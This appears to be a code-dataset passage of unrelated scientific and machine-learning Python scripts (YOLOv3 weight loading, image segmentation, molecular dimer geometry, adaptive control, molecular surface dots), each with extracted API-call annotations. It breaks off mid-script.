# (int32) version info: major, minor, revision
version = np.fromfile(f, dtype=np.int32, count=3)
# (int64) number of images seen during training
seen = np.fromfile(f, dtype=np.int64, count=1)
# the rest are weights
weights = np.fromfile(f, dtype=np.float32)
print(version, seen)
print(weights.shape)
ptr = 0
paired_modules = []
param_count = 0
for i, module in enumerate(modules):
if isinstance(module, nn.Conv2d):
if module.bias is not None:
paired_modules.append([module])
param_count += module.weight.numel()
param_count += module.bias.numel()
else:
paired_modules.append([module, modules[i+1]])
param_count += module.weight.numel()
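# the paired BatchNorm2d holds 4 tensors of size out_channels (bias, weight, running_mean, running_var), hence the factor of 4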
param_count += modules[i+1].bias.numel() * 4
print("param_count:", param_count)
for conv_bn_modules in paired_modules:
conv = conv_bn_modules[0]
bn = conv_bn_modules[1] if len(conv_bn_modules) == 2 else None
out_channel, in_channel, kernel_h, kernel_w = conv.weight.size()
if bn:
assert bn.bias.size()[0] == out_channel, "conv and bn are not paired"
# Bias
bn_b = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(bn.bias)
bn.bias.data.copy_(bn_b)
ptr += out_channel
# Weight
bn_w = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(bn.weight)
bn.weight.data.copy_(bn_w)
ptr += out_channel
# Running Mean
bn_rm = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(bn.running_mean)
bn.running_mean.data.copy_(bn_rm)
ptr += out_channel
# Running Var
bn_rv = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(bn.running_var)
bn.running_var.data.copy_(bn_rv)
ptr += out_channel
else:
# Load conv. bias
conv_b = torch.from_numpy(weights[ptr:ptr + out_channel]).view_as(conv.bias)
conv.bias.data.copy_(conv_b)
ptr += out_channel
# Load conv. weights
num_w = conv.weight.numel()
conv_w = torch.from_numpy(weights[ptr:ptr + num_w]).view_as(conv.weight)
conv.weight.data.copy_(conv_w)
ptr += num_w
print("parsed:", ptr)
print("succeed.")
def setup(args):
"""
Create configs and perform basic setups.
"""
cfg = get_cfg()
add_yolov3_config(cfg)
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
default_setup(cfg, args)
return cfg
def main(args):
cfg = setup(args)
model = DefaultTrainer.build_model(cfg)
modules = model.get_conv_bn_modules()
for m in modules:
print(m.weight.size())
load_darknet_weights(args.initial_weights, modules)
save_path = os.path.join(args.output_dir, "yolov3.pth")
torch.save(model.state_dict(), save_path)
print("model save to", save_path)
if __name__ == "__main__":
parser = default_argument_parser()
parser.add_argument("--initial_weights", metavar="FILE", help="path to initial weights file")
parser.add_argument("--output_dir", help="dir to save weights file")
args = parser.parse_args()
print("Command Line Args:", args)
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
)
|
[
"numpy.fromfile",
"yolov3.add_yolov3_config",
"detectron2.config.get_cfg",
"detectron2.engine.DefaultTrainer.build_model",
"os.path.join",
"torch.from_numpy",
"detectron2.engine.launch",
"detectron2.engine.default_setup",
"detectron2.engine.default_argument_parser"
] |
[((2929, 2938), 'detectron2.config.get_cfg', 'get_cfg', ([], {}), '()\n', (2936, 2938), False, 'from detectron2.config import get_cfg\n'), ((2943, 2965), 'yolov3.add_yolov3_config', 'add_yolov3_config', (['cfg'], {}), '(cfg)\n', (2960, 2965), False, 'from yolov3 import add_yolov3_config\n'), ((3064, 3088), 'detectron2.engine.default_setup', 'default_setup', (['cfg', 'args'], {}), '(cfg, args)\n', (3077, 3088), False, 'from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch\n'), ((3156, 3187), 'detectron2.engine.DefaultTrainer.build_model', 'DefaultTrainer.build_model', (['cfg'], {}), '(cfg)\n', (3182, 3187), False, 'from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch\n'), ((3355, 3398), 'os.path.join', 'os.path.join', (['args.output_dir', '"""yolov3.pth"""'], {}), "(args.output_dir, 'yolov3.pth')\n", (3367, 3398), False, 'import os\n'), ((3525, 3550), 'detectron2.engine.default_argument_parser', 'default_argument_parser', ([], {}), '()\n', (3548, 3550), False, 'from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch\n'), ((3795, 3929), 'detectron2.engine.launch', 'launch', (['main', 'args.num_gpus'], {'num_machines': 'args.num_machines', 'machine_rank': 'args.machine_rank', 'dist_url': 'args.dist_url', 'args': '(args,)'}), '(main, args.num_gpus, num_machines=args.num_machines, machine_rank=\n args.machine_rank, dist_url=args.dist_url, args=(args,))\n', (3801, 3929), False, 'from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch\n'), ((452, 491), 'numpy.fromfile', 'np.fromfile', (['f'], {'dtype': 'np.int32', 'count': '(3)'}), '(f, dtype=np.int32, count=3)\n', (463, 491), True, 'import numpy as np\n'), ((563, 602), 'numpy.fromfile', 'np.fromfile', (['f'], {'dtype': 'np.int64', 'count': '(1)'}), '(f, dtype=np.int64, count=1)\n', (574, 602), True, 'import numpy as np\n'), ((652, 684), 'numpy.fromfile', 'np.fromfile', (['f'], {'dtype': 'np.float32'}), '(f, dtype=np.float32)\n', (663, 684), True, 'import numpy as np\n'), ((2664, 2706), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + num_w]'], {}), '(weights[ptr:ptr + num_w])\n', (2680, 2706), False, 'import torch\n'), ((1672, 1720), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (1688, 1720), False, 'import torch\n'), ((1846, 1894), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (1862, 1894), False, 'import torch\n'), ((2031, 2079), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (2047, 2079), False, 'import torch\n'), ((2228, 2276), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (2244, 2276), False, 'import torch\n'), ((2442, 2490), 'torch.from_numpy', 'torch.from_numpy', (['weights[ptr:ptr + out_channel]'], {}), '(weights[ptr:ptr + out_channel])\n', (2458, 2490), False, 'import torch\n')]
|
import matplotlib.pyplot as plt
import numpy as np
import cv2
from skimage.data import astronaut
from skimage.color import rgb2gray
from skimage.filters import sobel
from skimage.segmentation import felzenszwalb, slic, quickshift, watershed
from skimage.segmentation import mark_boundaries
from skimage.util import img_as_float
image_path=r'/home/ccjunio/PycharmProjects/thermo_images/testes/images/dorso_costa00.jpeg'
img=cv2.imread(image_path)
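# note: cv2.imread returns a BGR uint8 array; the original skimage example uses img_as_float(astronaut()) instead (see the commented line below)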
# img = img_as_float(astronaut()[::2, ::2])
segments_fz = felzenszwalb(img, scale=100, sigma=0.5, min_size=50)
segments_slic = slic(img, n_segments=250, compactness=10, sigma=1)
segments_quick = quickshift(img, kernel_size=3, max_dist=6, ratio=0.5)
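# elevation map for the compact watershed: Sobel gradient of the grayscale image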
gradient = sobel(rgb2gray(img))
segments_watershed = watershed(gradient, markers=250, compactness=0.001)
print("Felzenszwalb number of segments: {}".format(len(np.unique(segments_fz))))
print('SLIC number of segments: {}'.format(len(np.unique(segments_slic))))
print('Quickshift number of segments: {}'.format(len(np.unique(segments_quick))))
fig, ax = plt.subplots(2, 2, figsize=(10, 10), sharex=True, sharey=True)
ax[0, 0].imshow(mark_boundaries(img, segments_fz))
ax[0, 0].set_title("Felzenszwalbs's method")
ax[0, 1].imshow(mark_boundaries(img, segments_slic))
ax[0, 1].set_title('SLIC')
ax[1, 0].imshow(mark_boundaries(img, segments_quick))
ax[1, 0].set_title('Quickshift')
ax[1, 1].imshow(mark_boundaries(img, segments_watershed))
# ax[1, 1].imshow(mark_boundaries(img, segments_watershed))
ax[1, 1].set_title('Compact watershed')
for a in ax.ravel():
a.set_axis_off()
plt.tight_layout()
plt.show()
|
[
"skimage.color.rgb2gray",
"skimage.segmentation.mark_boundaries",
"numpy.unique",
"matplotlib.pyplot.show",
"skimage.segmentation.watershed",
"skimage.segmentation.felzenszwalb",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.tight_layout",
"skimage.segmentation.quickshift",
"skimage.segmentation.slic",
"cv2.imread"
] |
[((425, 447), 'cv2.imread', 'cv2.imread', (['image_path'], {}), '(image_path)\n', (435, 447), False, 'import cv2\n'), ((507, 559), 'skimage.segmentation.felzenszwalb', 'felzenszwalb', (['img'], {'scale': '(100)', 'sigma': '(0.5)', 'min_size': '(50)'}), '(img, scale=100, sigma=0.5, min_size=50)\n', (519, 559), False, 'from skimage.segmentation import felzenszwalb, slic, quickshift, watershed\n'), ((576, 626), 'skimage.segmentation.slic', 'slic', (['img'], {'n_segments': '(250)', 'compactness': '(10)', 'sigma': '(1)'}), '(img, n_segments=250, compactness=10, sigma=1)\n', (580, 626), False, 'from skimage.segmentation import felzenszwalb, slic, quickshift, watershed\n'), ((644, 697), 'skimage.segmentation.quickshift', 'quickshift', (['img'], {'kernel_size': '(3)', 'max_dist': '(6)', 'ratio': '(0.5)'}), '(img, kernel_size=3, max_dist=6, ratio=0.5)\n', (654, 697), False, 'from skimage.segmentation import felzenszwalb, slic, quickshift, watershed\n'), ((751, 802), 'skimage.segmentation.watershed', 'watershed', (['gradient'], {'markers': '(250)', 'compactness': '(0.001)'}), '(gradient, markers=250, compactness=0.001)\n', (760, 802), False, 'from skimage.segmentation import felzenszwalb, slic, quickshift, watershed\n'), ((1053, 1115), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(10, 10)', 'sharex': '(True)', 'sharey': '(True)'}), '(2, 2, figsize=(10, 10), sharex=True, sharey=True)\n', (1065, 1115), True, 'import matplotlib.pyplot as plt\n'), ((1582, 1600), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1598, 1600), True, 'import matplotlib.pyplot as plt\n'), ((1601, 1611), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1609, 1611), True, 'import matplotlib.pyplot as plt\n'), ((715, 728), 'skimage.color.rgb2gray', 'rgb2gray', (['img'], {}), '(img)\n', (723, 728), False, 'from skimage.color import rgb2gray\n'), ((1133, 1166), 'skimage.segmentation.mark_boundaries', 'mark_boundaries', (['img', 'segments_fz'], {}), '(img, segments_fz)\n', (1148, 1166), False, 'from skimage.segmentation import mark_boundaries\n'), ((1229, 1264), 'skimage.segmentation.mark_boundaries', 'mark_boundaries', (['img', 'segments_slic'], {}), '(img, segments_slic)\n', (1244, 1264), False, 'from skimage.segmentation import mark_boundaries\n'), ((1309, 1345), 'skimage.segmentation.mark_boundaries', 'mark_boundaries', (['img', 'segments_quick'], {}), '(img, segments_quick)\n', (1324, 1345), False, 'from skimage.segmentation import mark_boundaries\n'), ((1396, 1436), 'skimage.segmentation.mark_boundaries', 'mark_boundaries', (['img', 'segments_watershed'], {}), '(img, segments_watershed)\n', (1411, 1436), False, 'from skimage.segmentation import mark_boundaries\n'), ((859, 881), 'numpy.unique', 'np.unique', (['segments_fz'], {}), '(segments_fz)\n', (868, 881), True, 'import numpy as np\n'), ((932, 956), 'numpy.unique', 'np.unique', (['segments_slic'], {}), '(segments_slic)\n', (941, 956), True, 'import numpy as np\n'), ((1013, 1038), 'numpy.unique', 'np.unique', (['segments_quick'], {}), '(segments_quick)\n', (1022, 1038), True, 'import numpy as np\n')]
|
import pytest
from hyperloop.Python.mission import lat_long
import numpy as np
from openmdao.api import Group, Problem
def create_problem(component):
root = Group()
prob = Problem(root)
prob.root.add('comp', component)
return prob
class TestMissionDrag(object):
def test_case1_vs_npss(self):
component = lat_long.LatLong()
prob = create_problem(component)
prob.setup()
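# 100 km offsets in x and y from an origin at (35 N, 121 W); R_E is the Earth radius in km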
prob['comp.x'] = 100.0
prob['comp.y'] = 100.0
prob['comp.lat_origin'] = 35.0
prob['comp.long_origin'] = -121.0
prob['comp.R_E'] = 6378.0
prob.run()
assert np.isclose(prob['comp.lat'], 35.898335, rtol = 0.01)
assert np.isclose(prob['comp.long'], -119.891025, rtol = 0.01)
|
[
"hyperloop.Python.mission.lat_long.LatLong",
"numpy.isclose",
"openmdao.api.Problem",
"openmdao.api.Group"
] |
[((162, 169), 'openmdao.api.Group', 'Group', ([], {}), '()\n', (167, 169), False, 'from openmdao.api import Group, Problem\n'), ((181, 194), 'openmdao.api.Problem', 'Problem', (['root'], {}), '(root)\n', (188, 194), False, 'from openmdao.api import Group, Problem\n'), ((338, 356), 'hyperloop.Python.mission.lat_long.LatLong', 'lat_long.LatLong', ([], {}), '()\n', (354, 356), False, 'from hyperloop.Python.mission import lat_long\n'), ((634, 684), 'numpy.isclose', 'np.isclose', (["prob['comp.lat']", '(35.898335)'], {'rtol': '(0.01)'}), "(prob['comp.lat'], 35.898335, rtol=0.01)\n", (644, 684), True, 'import numpy as np\n'), ((702, 755), 'numpy.isclose', 'np.isclose', (["prob['comp.long']", '(-119.891025)'], {'rtol': '(0.01)'}), "(prob['comp.long'], -119.891025, rtol=0.01)\n", (712, 755), True, 'import numpy as np\n')]
|
from pyqchem.structure import Structure
import numpy as np
# Ethene parallel position
def dimer_ethene(distance, slide_y, slide_z):
coordinates = [[0.0000000, 0.0000000, 0.6660120],
[0.0000000, 0.0000000, -0.6660120],
[0.0000000, 0.9228100, 1.2279200],
[0.0000000, -0.9228100, 1.2279200],
[0.0000000, -0.9228100, -1.2279200],
[0.0000000, 0.9228100, -1.2279200],
[distance, 0.0000000, 0.6660120],
[distance, 0.0000000, -0.6660120],
[distance, 0.9228100, 1.2279200],
[distance, -0.9228100, 1.2279200],
[distance, -0.9228100, -1.2279200],
[distance, 0.9228100, -1.2279200]]
coordinates = np.array(coordinates)
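# shift the second monomer (atoms 6-11) by the slide offsets; its x separation is already set to `distance`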
coordinates[6:, 1] = coordinates[6:, 1] + slide_y
coordinates[6:, 2] = coordinates[6:, 2] + slide_z
symbols = ['C', 'C', 'H', 'H', 'H', 'H', 'C', 'C', 'H', 'H', 'H', 'H']
molecule = Structure(coordinates=coordinates,
symbols=symbols,
charge=0)
return molecule, {'state_threshold': 0.2,
'n_mon': 6}
# Tetrafluoroethene
def dimer_tetrafluoroethene(distance, slide_y, slide_z):
monomer = [[ 0.6624670117, 0.0000000000, 0.0000000000],
[-0.6624670117, 0.0000000000, 0.0000000000],
[ 1.3834661472, 1.0993897934, 0.0000000000],
[ 1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, 1.0993897934, 0.0000000000]]
symbols = ['C', 'C', 'F', 'F', 'F', 'F']
monomer2 = np.array(monomer)
#monomer2 = np.dot(monomer, rotation_matrix([0, 1, 0], np.pi / 2))
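# displace the second monomer: `distance` along z plus the slide offsets on the remaining axes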
monomer2[:, 2] = monomer2[:, 2] + distance
monomer2[:, 1] = monomer2[:, 1] + slide_y
monomer2[:, 0] = monomer2[:, 0] + slide_z
coordinates = np.vstack([monomer, monomer2])
molecule = Structure(coordinates=coordinates,
symbols=symbols * 2,
charge=0)
return molecule, {'state_threshold': 0.2,
'n_mon': len(monomer)}
# Mixed ethene / tetrafluoroethene dimer
def dimer_mix(distance, slide_y, slide_z):
monomer1 = [[ 0.6660120, 0.0000000, 0.0000000,],
[-0.6660120, 0.0000000, 0.0000000,],
[ 1.2279200, 0.9228100, 0.0000000,],
[ 1.2279200, -0.9228100, 0.0000000,],
[-1.2279200, -0.9228100, 0.0000000,],
[-1.2279200, 0.9228100, 0.0000000,]]
symbols1 = ['C', 'C', 'H', 'H', 'H', 'H']
monomer2 = [[ 0.6624670117, 0.0000000000, 0.0000000000],
[-0.6624670117, 0.0000000000, 0.0000000000],
[ 1.3834661472, 1.0993897934, 0.0000000000],
[ 1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, -1.0993897934, 0.0000000000],
[-1.3834661472, 1.0993897934, 0.0000000000]]
symbols2 = ['C', 'C', 'F', 'F', 'F', 'F']
monomer2 = np.array(monomer2)
monomer2[:, 2] = monomer2[:, 2] + distance
monomer2[:, 1] = monomer2[:, 1] + slide_y
monomer2[:, 0] = monomer2[:, 0] + slide_z
coordinates = np.vstack([monomer1, monomer2])
symbols = symbols1 + symbols2
molecule = Structure(coordinates=coordinates,
symbols=symbols,
charge=0)
return molecule, {'state_threshold': 0.4,
'n_mon': len(monomer1)}
|
[
"numpy.array",
"pyqchem.structure.Structure",
"numpy.vstack"
] |
[((826, 847), 'numpy.array', 'np.array', (['coordinates'], {}), '(coordinates)\n', (834, 847), True, 'import numpy as np\n'), ((1048, 1109), 'pyqchem.structure.Structure', 'Structure', ([], {'coordinates': 'coordinates', 'symbols': 'symbols', 'charge': '(0)'}), '(coordinates=coordinates, symbols=symbols, charge=0)\n', (1057, 1109), False, 'from pyqchem.structure import Structure\n'), ((1748, 1765), 'numpy.array', 'np.array', (['monomer'], {}), '(monomer)\n', (1756, 1765), True, 'import numpy as np\n'), ((1995, 2025), 'numpy.vstack', 'np.vstack', (['[monomer, monomer2]'], {}), '([monomer, monomer2])\n', (2004, 2025), True, 'import numpy as np\n'), ((2042, 2107), 'pyqchem.structure.Structure', 'Structure', ([], {'coordinates': 'coordinates', 'symbols': '(symbols * 2)', 'charge': '(0)'}), '(coordinates=coordinates, symbols=symbols * 2, charge=0)\n', (2051, 2107), False, 'from pyqchem.structure import Structure\n'), ((3128, 3146), 'numpy.array', 'np.array', (['monomer2'], {}), '(monomer2)\n', (3136, 3146), True, 'import numpy as np\n'), ((3306, 3337), 'numpy.vstack', 'np.vstack', (['[monomer1, monomer2]'], {}), '([monomer1, monomer2])\n', (3315, 3337), True, 'import numpy as np\n'), ((3388, 3449), 'pyqchem.structure.Structure', 'Structure', ([], {'coordinates': 'coordinates', 'symbols': 'symbols', 'charge': '(0)'}), '(coordinates=coordinates, symbols=symbols, charge=0)\n', (3397, 3449), False, 'from pyqchem.structure import Structure\n')]
|
#!/usr/bin/env python3
"""
Adaptive Affine Control:
My favorite myopic (not MPC, DP, or RL) control-law when absolutely nothing is known about your system except
that the control is additive and fully-actuated:
```
dx/dt = f(x,t) + u # drift f unknown, state x at time t known, choose control u to make x=r
u = W.dot(x) + b # policy is affine function of state
dW/dt = outer(k*(r-x), x) # parameters are adapted (learned online) to oppose the...
db/dt = k*(r-x) # ... gradient of the error-energy-rate d/dt((k/2)*(r-x)^2)
```
Try this with any crazy f. Even throw in a B(x,t) transformation on u (though no guarantees for that).
It's basically PID but with the PD gains evolving according to the regression-like dW/dt I gave.
PID with stationary PD gains fails when the f is reasonably nonlinear. This law still works.
Of course, additive-control fully-actuated systems pretty much only model lame low-level problems, but still neat.
"""
# Dependencies
import numpy as np
from matplotlib import pyplot
##################################################
# Controller
class C:
def __init__(self, n, k):
self.n = int(n)
self.k = float(k)
self.W = np.zeros((n, n), dtype=float)
self.b = np.zeros(n, dtype=float)
def u(self, r, x, dt):
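# one Euler step of the adaptation law (dW = outer(k*(r-x), x)*dt, db = k*(r-x)*dt), then evaluate the affine policy u = W x + b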
ked = self.k*(r - x)*dt
self.W += np.outer(ked, x)
self.b += ked
return self.W.dot(x) + self.b
##################################################
# Drift dynamic
n = 3
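# the drift is the chaotic Lorenz system (sigma=10, rho=28, beta=2.6), i.e. a deliberately nasty nonlinear f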
def f(x, t):
return np.array([10.0*(x[1] - x[0]),
x[0]*(28.0 - x[2]) - x[1],
x[0]*x[1] - 2.6*x[2]])
# Actuator dynamic
# (needs to be identity for Lyapunov proof, but might still work otherwise)
def B(x, t):
return np.array([[x[1], 0.0, 0.0],
[ 0.0, 2*x[0], 0.0],
[ 0.0, 0.0, 1.0]])
##################################################
# Time
dt = 0.001
T = np.arange(0.0, 3.0, dt)
# State
X = np.zeros((len(T), n), dtype=float)
X[0] = [-1.0, 2.0, 3.0]
# Control
U = np.zeros((len(T), n), dtype=float)
c = C(n, 1.0)
# Reference
R = np.array([[6.0, 7.0, -7.0]] * len(T))
##################################################
# Simulation
control = True
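# forward-Euler simulation of dx/dt = f(x,t) + B(x,t) u, with the control recomputed every step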
for i in range(len(T)-1):
if control: U[i] = c.u(R[i], X[i], dt)
dxdt = f(X[i], T[i]) + B(X[i], T[i]).dot(U[i])
X[i+1] = X[i] + dxdt*dt
##################################################
# Plot
fig = pyplot.figure()
if control: fig.suptitle("Controlled Response", fontsize=26)
else: fig.suptitle("Natural Response", fontsize=26)
ax = None
for i in range(n):
ax = fig.add_subplot(n, 1, i+1, sharex=ax)
ax.plot(T, X[:, i], color='b', linewidth=2, label="state")
ax.plot(T, R[:, i], color='g', linewidth=3, linestyle=':', label="desire")
ax.plot(T[:-1], U[:-1, i], color='r', linewidth=0.5, label="action", scaley=False)
ax.set_xlim([T[0], T[-1]])
ax.set_ylabel("state "+str(i), fontsize=20)
ax.grid(True)
ax.set_xlabel("time", fontsize=20)
ax.legend()
pyplot.show()
|
[
"numpy.array",
"matplotlib.pyplot.figure",
"numpy.zeros",
"numpy.outer",
"numpy.arange",
"matplotlib.pyplot.show"
] |
[((1963, 1986), 'numpy.arange', 'np.arange', (['(0.0)', '(3.0)', 'dt'], {}), '(0.0, 3.0, dt)\n', (1972, 1986), True, 'import numpy as np\n'), ((2473, 2488), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {}), '()\n', (2486, 2488), False, 'from matplotlib import pyplot\n'), ((3051, 3064), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (3062, 3064), False, 'from matplotlib import pyplot\n'), ((1530, 1622), 'numpy.array', 'np.array', (['[10.0 * (x[1] - x[0]), x[0] * (28.0 - x[2]) - x[1], x[0] * x[1] - 2.6 * x[2]]'], {}), '([10.0 * (x[1] - x[0]), x[0] * (28.0 - x[2]) - x[1], x[0] * x[1] - \n 2.6 * x[2]])\n', (1538, 1622), True, 'import numpy as np\n'), ((1772, 1839), 'numpy.array', 'np.array', (['[[x[1], 0.0, 0.0], [0.0, 2 * x[0], 0.0], [0.0, 0.0, 1.0]]'], {}), '([[x[1], 0.0, 0.0], [0.0, 2 * x[0], 0.0], [0.0, 0.0, 1.0]])\n', (1780, 1839), True, 'import numpy as np\n'), ((1205, 1234), 'numpy.zeros', 'np.zeros', (['(n, n)'], {'dtype': 'float'}), '((n, n), dtype=float)\n', (1213, 1234), True, 'import numpy as np\n'), ((1252, 1276), 'numpy.zeros', 'np.zeros', (['n'], {'dtype': 'float'}), '(n, dtype=float)\n', (1260, 1276), True, 'import numpy as np\n'), ((1354, 1370), 'numpy.outer', 'np.outer', (['ked', 'x'], {}), '(ked, x)\n', (1362, 1370), True, 'import numpy as np\n')]
|
#!/usr/bin/python3.7
#Author: <NAME>
import sys
import os
import math
import re
import numpy as np
#print('usage: <>.py <file.pdb> \nexecute nsc to generate point-based surface and create tables and if verbose==1 files dotslabel1.xyzrgb dotslabel2.xyzrgb dotslabel3.xyzrgb and dotslabel4.xyzrgb\n')
def pdbsurface(filepdb,nscexe):
verbose=0
#label1 {H, Cl, Br, I} white/grey 0.9 0.9 0.9
#label2 {O, N, S, F} red 1 0 0
#label3 {C, P, B} green 0 1 0
#label4 {others} blue 0 0 1
tabR= {'C':'%.2f' % 1.70, 'O':1.52, 'N':1.55, 'S':1.80, 'P':1.80, 'B':1.72, 'Br':1.85, 'Cl':1.75, 'I':1.98, 'F':1.47, 'H':'%.2f' % 1.20, 'Hp':'%.2f' % 1.10, 'X':'%.2f' % 1.10}
label= {'C':3, 'P':3, 'B':3, 'O':2, 'N':2, 'S':2, 'F':2, 'Hp':2, 'H':1, 'Cl':1, 'Br':1, 'I':1}
rgb= np.array([[0, 0, 0], [0.9, 0.9, 0.9], [1, 0, 0], [0, 1, 0], [0, 0, 1]])
espace5=' '
espace6=' '
fichier2D=0
filepdb=open(filepdb,'r')
getstr=filepdb.read().split('\n')
filepdb.close()
tabLignesPdb=[]
tabLignesPdb.append('')
compt=1
while (compt < len(getstr)):
tabLignesPdb.append(re.split('\s+', getstr[compt].strip()))
compt=compt+1
compt=1
comptatomes=0
getx=[]
getx.append('')
gety=[]
gety.append('')
getz=[]
getz.append('')
getA=[]
getA.append('')
getRayon=[]
getRayon.append('')
while (compt < len(tabLignesPdb)):
if (tabLignesPdb[compt][0] == 'HETATM' or tabLignesPdb[compt][0] == 'ATOM'):
xAtome=float(tabLignesPdb[compt][5])
yAtome=float(tabLignesPdb[compt][6])
zAtome=float(tabLignesPdb[compt][7])
getx.append(xAtome)
gety.append(yAtome)
getz.append(zAtome)
if (float(zAtome) == 0):
fichier2D=fichier2D+1
getA.append(tabLignesPdb[compt][2])
if(getA[compt]!='C' and getA[compt]!='O' and getA[compt]!='N' and getA[compt]!='P' and getA[compt]!='B' and getA[compt]!='H' and getA[compt]!='F' and getA[compt]!='Br' and getA[compt]!='Cl' and getA[compt]!='S' and getA[compt]!='I' and getA[compt]!='X' and getA[compt]!='Hp'):
print("Warning: atom %s set as C because it is not the tab (unusual in medchem)" % getA[compt])
getA[compt]='C'
getRayon.append(tabR[getA[compt]])
comptatomes=comptatomes+1
compt=compt+1
nbatomes=comptatomes
if (fichier2D==int(nbatomes)):
print("Warning: pdb file in 2D; SenSaaS needs 3D coordinates to work properly")
compt=1
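# hydrogens within 1.2 A of an N or O are treated as polar (Hp) and get the smaller Hp radius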
while (compt <= nbatomes):
if (getA[compt] == 'H'):
compt2=1
while(compt2 <= nbatomes):
if (getA[compt2] == 'N' or getA[compt2] == 'O'):
distHp= math.sqrt((getx[compt] - getx[compt2])**2 + (gety[compt] - gety[compt2])**2 + (getz[compt] - getz[compt2])**2)
if (distHp <= 1.2):
getRayon[compt]=tabR['Hp']
compt2=compt2+1
compt=compt+1
#nsc:
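# write psa.in (XYZR format) and call the external NSC binary; the dot surface is read back from psa.out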
compt=1
psaIn=open('psa.in','w')
psaIn.write('* XYZR\n')
psaIn.write(espace6+str(nbatomes)+'\n')
while (compt <= nbatomes):
x='%.2f' % getx[compt]
y='%.2f' % gety[compt]
z='%.2f' % getz[compt]
psaIn.write('%8s %8s %8s %8s %8s \n'%(x,y,z,getRayon[compt],getA[compt]))
compt=compt+1
psaIn.close()
cmd = '%s psa.in ' % (nscexe)
os.system(cmd)
psaOut=open('psa.out', 'r')
lignepsaOut= psaOut.readlines()
psaOut.close()
tabLignesPsaOut=[]
compt=3
while (compt < len(lignepsaOut)):
tabLignesPsaOut.append(re.split('\s+', lignepsaOut[compt].strip()))
compt=compt+1
nbDots= int(tabLignesPsaOut[0][2])
#print("nbDots= %6s" % (nbDots))
del tabLignesPsaOut[0]
del tabLignesPsaOut[0]
getDots=np.empty(shape=[nbDots,3], dtype='float64')
getrgb=np.empty(shape=[nbDots,3], dtype='float64')
compt=nbatomes+2
comptDots=0
ligneFicDots=[]
label1=[]
label2=[]
label3=[]
label4=[]
if(verbose==1):
dotsFic=open('dots.xyzrgb', 'w')
while (compt < nbatomes+nbDots+2):
xDot=float(tabLignesPsaOut[compt][2])
yDot=float(tabLignesPsaOut[compt][3])
zDot=float(tabLignesPsaOut[compt][4])
compt2=1
m=100
mi=0
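# find the atom nearest to this surface dot; its element (and Hp radius) decides the dot's colour label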
while(compt2 <= nbatomes):
xa=getx[compt2]
ya=gety[compt2]
za=getz[compt2]
goodDots= math.sqrt((xDot - xa)**2 + (yDot - ya)**2 + (zDot - za)**2)
if(goodDots < m):
m=goodDots
mi=compt2
compt2=compt2+1
atomeCorrespondant=getA[mi]
rgbi=label[atomeCorrespondant]
if(getRayon[mi]==tabR['Hp']):
rgbi=label['O']
getrgb[comptDots,:]=[rgb[rgbi,0], rgb[rgbi,1], rgb[rgbi,2]]
getDots[comptDots,:]=[xDot,yDot,zDot]
if (rgbi == 1):
label1.append(np.vstack([getDots[comptDots], getrgb[comptDots]]))
elif (rgbi == 2):
label2.append(np.vstack([getDots[comptDots], getrgb[comptDots]]))
elif (rgbi == 3):
label3.append(np.vstack([getDots[comptDots], getrgb[comptDots]]))
elif (rgbi == 4):
label4.append(np.vstack([getDots[comptDots], getrgb[comptDots]]))
else:
print("no label for dot no %5s ?\n" %(comptDots))
if(verbose==1):
dotsFic.write('%8s'%xDot+'%8s'%yDot+'%8s'%zDot+espace5+'%5s'%(rgb[rgbi,0])+'%5s'%(rgb[rgbi,1])+'%5s'%(rgb[rgbi,2])+'\n')
comptDots=comptDots+1
compt=compt+1
if(verbose==1):
dotsFic.close()
dotslabel1=open('dotslabel1.xyzrgb', 'w')
dotslabel2=open('dotslabel2.xyzrgb', 'w')
dotslabel3=open('dotslabel3.xyzrgb', 'w')
dotslabel4=open('dotslabel4.xyzrgb', 'w')
getDots1=np.empty(shape=[len(label1),3], dtype='float64')
getrgb1=np.empty(shape=[len(label1),3], dtype='float64')
getDots2=np.empty(shape=[len(label2),3], dtype='float64')
getrgb2=np.empty(shape=[len(label2),3], dtype='float64')
getDots3=np.empty(shape=[len(label3),3], dtype='float64')
getrgb3=np.empty(shape=[len(label3),3], dtype='float64')
getDots4=np.empty(shape=[len(label4),3], dtype='float64')
getrgb4=np.empty(shape=[len(label4),3], dtype='float64')
compt=0
while(compt < len(label1)):
getDots1[compt]= label1[compt][0]
getrgb1[compt]= label1[compt][1]
if(verbose==1):
dotslabel1.write('%8s'%getDots1[compt,0]+'%8s'%getDots1[compt,1]+'%8s'%getDots1[compt,2]+espace5+'%5s'%getrgb1[compt,0]+'%5s'%getrgb1[compt,1]+'%5s'%getrgb1[compt,2]+'\n')
compt=compt+1
compt=0
while(compt < len(getDots2)):
getDots2[compt]= label2[compt][0]
getrgb2[compt]= label2[compt][1]
if(verbose==1):
